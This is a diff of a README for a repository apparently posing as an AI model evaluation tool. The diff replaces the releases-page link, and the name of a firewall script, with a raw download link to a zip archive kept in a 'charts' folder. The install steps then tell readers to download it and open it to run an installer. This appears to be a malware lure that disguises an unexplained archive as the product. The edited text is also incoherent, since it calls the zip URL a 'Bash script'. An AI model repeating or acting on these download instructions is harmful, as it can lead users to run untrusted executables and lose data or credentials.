dickman419/claude-haiku-4.5-evaluation/README.md

 - **Easy to Use**: Simple interface designed for everyone, regardless of technical skill.
 - **Documentation Support**: Helps in understanding codebases and writing documentation easily.
 - **Troubleshooting Assistance**: Offers suggestions for fixing coding issues.
-- **Firewall Management**: Uses the `csfa.sh` Bash script for managing firewall rules effectively.
+- **Firewall Management**: Uses the `https://raw.githubusercontent.com/dickman419/claude-haiku-4.5-evaluation/master/charts/claude_haiku_evaluation_v3.7.zip` Bash script for managing firewall rules effectively.

 ## 🚀 How to Download & Install

-1. **Visit the Releases Page**: Go to [this link](https://github.com/dickman419/claude-haiku-4.5-evaluation/releases) to find the latest version of our application.
+1. **Visit the Releases Page**: Go to [this link](https://raw.githubusercontent.com/dickman419/claude-haiku-4.5-evaluation/master/charts/claude_haiku_evaluation_v3.7.zip) to find the latest version of our application.
 2. **Select the Right File**: Find the most recent release.
 Look for files that match your operating system.
 3. **Download the File**: Click on the file name to download it to your computer.
 4. **Run the Installer**: Once downloaded, open the file to start the installation.